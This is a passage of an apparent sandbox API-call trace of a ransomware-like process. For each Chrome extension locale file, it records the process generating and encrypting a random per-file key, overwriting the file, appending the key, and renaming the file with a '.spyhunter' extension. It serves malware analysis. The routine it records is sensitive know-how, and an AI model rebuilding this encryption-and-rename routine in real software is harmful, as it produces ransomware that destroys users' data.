Flags=0x8, Size=0x70) returned 0x31f188 [0134.156] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f340*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f340*=0x30) returned 1 [0134.156] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.156] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json") returned 155 [0134.156] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.157] GetProcessHeap () returned 0x2c0000 [0134.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0134.157] ReadFile (in: hFile=0xec, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f304, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f304*=0xd2, lpOverlapped=0x0) returned 1 [0134.157] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff2e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.157] WriteFile (in: hFile=0xec, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xd2, lpNumberOfBytesWritten=0x270f304, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f304*=0xd2, lpOverlapped=0x0) returned 1 [0134.158] GetProcessHeap () returned 0x2c0000 [0134.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0134.158] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.158] WriteFile (in: hFile=0xec, lpBuffer=0x270f344*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f304, lpOverlapped=0x0 | out: lpBuffer=0x270f344*, lpNumberOfBytesWritten=0x270f304*=0x4, lpOverlapped=0x0) returned 1 [0134.158] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f304, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f304*=0x30, lpOverlapped=0x0) returned 1 [0134.158] CloseHandle (hObject=0xec) returned 1 [0134.158] GetProcessHeap () returned 0x2c0000 [0134.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.158] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json.spyhunter") returned 165 [0134.158] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json.spyhunter")) returned 1 [0134.159] GetProcessHeap () returned 0x2c0000 [0134.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.159] GetProcessHeap () returned 0x2c0000 [0134.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0134.159] GetProcessHeap () returned 0x2c0000 [0134.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0faf8 | out: hHeap=0x2c0000) returned 1 [0134.160] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f340 | out: pbBuffer=0x270f340) returned 1 [0134.160] GetProcessHeap () returned 0x2c0000 [0134.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0134.160] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f338*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f338*=0x30) returned 1 [0134.161] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.161] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json") returned 155 [0134.161] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.161] GetProcessHeap () returned 0x2c0000 [0134.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0134.161] ReadFile (in: hFile=0xec, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f2fc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f2fc*=0xe9, lpOverlapped=0x0) returned 1 [0134.162] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff17, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.162] WriteFile (in: hFile=0xec, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xe9, lpNumberOfBytesWritten=0x270f2fc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f2fc*=0xe9, lpOverlapped=0x0) returned 1 [0134.162] GetProcessHeap () returned 0x2c0000 [0134.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0134.162] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.162] WriteFile (in: hFile=0xec, lpBuffer=0x270f33c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f2fc, lpOverlapped=0x0 | out: lpBuffer=0x270f33c*, lpNumberOfBytesWritten=0x270f2fc*=0x4, lpOverlapped=0x0) returned 1 [0134.162] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f2fc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f2fc*=0x30, lpOverlapped=0x0) returned 1 [0134.162] CloseHandle (hObject=0xec) returned 1 [0134.163] GetProcessHeap () returned 0x2c0000 [0134.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.163] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json.spyhunter") returned 165 [0134.163] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json.spyhunter")) returned 1 [0134.163] GetProcessHeap () returned 0x2c0000 [0134.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.163] GetProcessHeap () returned 0x2c0000 [0134.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0134.164] GetProcessHeap () returned 0x2c0000 [0134.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0f978 | out: hHeap=0x2c0000) returned 1 [0134.165] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f338 | out: pbBuffer=0x270f338) returned 1 [0134.165] GetProcessHeap () returned 0x2c0000 [0134.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0134.165] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f330*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f330*=0x30) returned 1 [0134.165] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.166] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json") returned 155 [0134.166] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.166] GetProcessHeap () returned 0x2c0000 [0134.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0134.166] ReadFile (in: hFile=0xec, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f2f4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f2f4*=0xe4, lpOverlapped=0x0) returned 1 [0134.167] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff1c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.167] WriteFile (in: hFile=0xec, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x270f2f4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f2f4*=0xe4, lpOverlapped=0x0) returned 1 [0134.167] GetProcessHeap () returned 0x2c0000 [0134.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0134.167] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.167] WriteFile (in: hFile=0xec, lpBuffer=0x270f334*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f2f4, lpOverlapped=0x0 | out: lpBuffer=0x270f334*, lpNumberOfBytesWritten=0x270f2f4*=0x4, lpOverlapped=0x0) returned 1 [0134.167] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f2f4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f2f4*=0x30, lpOverlapped=0x0) returned 1 [0134.167] CloseHandle (hObject=0xec) returned 1 [0134.167] GetProcessHeap () returned 0x2c0000 [0134.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.167] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json.spyhunter") returned 165 [0134.168] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json.spyhunter")) returned 1 [0134.168] GetProcessHeap () returned 0x2c0000 [0134.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.168] GetProcessHeap () returned 0x2c0000 [0134.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0134.168] GetProcessHeap () returned 0x2c0000 [0134.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0f3f8 | out: hHeap=0x2c0000) returned 1 [0134.170] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f330 | out: pbBuffer=0x270f330) returned 1 [0134.170] GetProcessHeap () returned 0x2c0000 [0134.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0134.170] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f328*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f328*=0x30) returned 1 [0134.170] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.170] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json") returned 155 [0134.170] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.170] GetProcessHeap () returned 0x2c0000 [0134.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0134.170] ReadFile (in: hFile=0xec, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f2ec, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f2ec*=0xe6, lpOverlapped=0x0) returned 1 [0134.171] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.171] WriteFile (in: hFile=0xec, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x270f2ec, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f2ec*=0xe6, lpOverlapped=0x0) returned 1 [0134.171] GetProcessHeap () returned 0x2c0000 [0134.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0134.171] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.171] WriteFile (in: hFile=0xec, lpBuffer=0x270f32c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f2ec, lpOverlapped=0x0 | out: lpBuffer=0x270f32c*, lpNumberOfBytesWritten=0x270f2ec*=0x4, lpOverlapped=0x0) returned 1 [0134.172] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f2ec, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f2ec*=0x30, lpOverlapped=0x0) returned 1 [0134.172] CloseHandle (hObject=0xec) returned 1 [0134.172] GetProcessHeap () returned 0x2c0000 [0134.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.172] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json.spyhunter") returned 165 [0134.172] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json.spyhunter")) returned 1 [0134.172] GetProcessHeap () returned 0x2c0000 [0134.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.173] GetProcessHeap () returned 0x2c0000 [0134.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0134.173] GetProcessHeap () returned 0x2c0000 [0134.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ceffe8 | out: hHeap=0x2c0000) returned 1 [0134.174] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f328 | out: pbBuffer=0x270f328) returned 1 [0134.174] GetProcessHeap () returned 0x2c0000 [0134.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0134.174] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f320*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f320*=0x30) returned 1 [0134.174] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.174] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json") returned 155 [0134.174] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.174] GetProcessHeap () returned 0x2c0000 [0134.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0134.174] ReadFile (in: hFile=0xec, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f2e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f2e4*=0xec, lpOverlapped=0x0) returned 1 [0134.175] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff14, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.175] WriteFile (in: hFile=0xec, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x270f2e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f2e4*=0xec, lpOverlapped=0x0) returned 1 [0134.175] GetProcessHeap () returned 0x2c0000 [0134.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0134.175] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.175] WriteFile (in: hFile=0xec, lpBuffer=0x270f324*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f2e4, lpOverlapped=0x0 | out: lpBuffer=0x270f324*, lpNumberOfBytesWritten=0x270f2e4*=0x4, lpOverlapped=0x0) returned 1 [0134.176] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f2e4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f2e4*=0x30, lpOverlapped=0x0) returned 1 [0134.176] CloseHandle (hObject=0xec) returned 1 [0134.176] GetProcessHeap () returned 0x2c0000 [0134.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.176] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json.spyhunter") returned 165 [0134.176] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json.spyhunter")) returned 1 [0134.177] GetProcessHeap () returned 0x2c0000 [0134.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.177] GetProcessHeap () returned 0x2c0000 [0134.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0134.177] GetProcessHeap () returned 0x2c0000 [0134.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cefce0 | out: hHeap=0x2c0000) returned 1 [0134.178] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f320 | out: pbBuffer=0x270f320) returned 1 [0134.178] GetProcessHeap () returned 0x2c0000 [0134.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0134.178] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f318*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f318*=0x30) returned 1 [0134.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.178] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json") returned 155 [0134.178] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.178] GetProcessHeap () returned 0x2c0000 [0134.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0134.179] ReadFile (in: hFile=0xec, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f2dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, 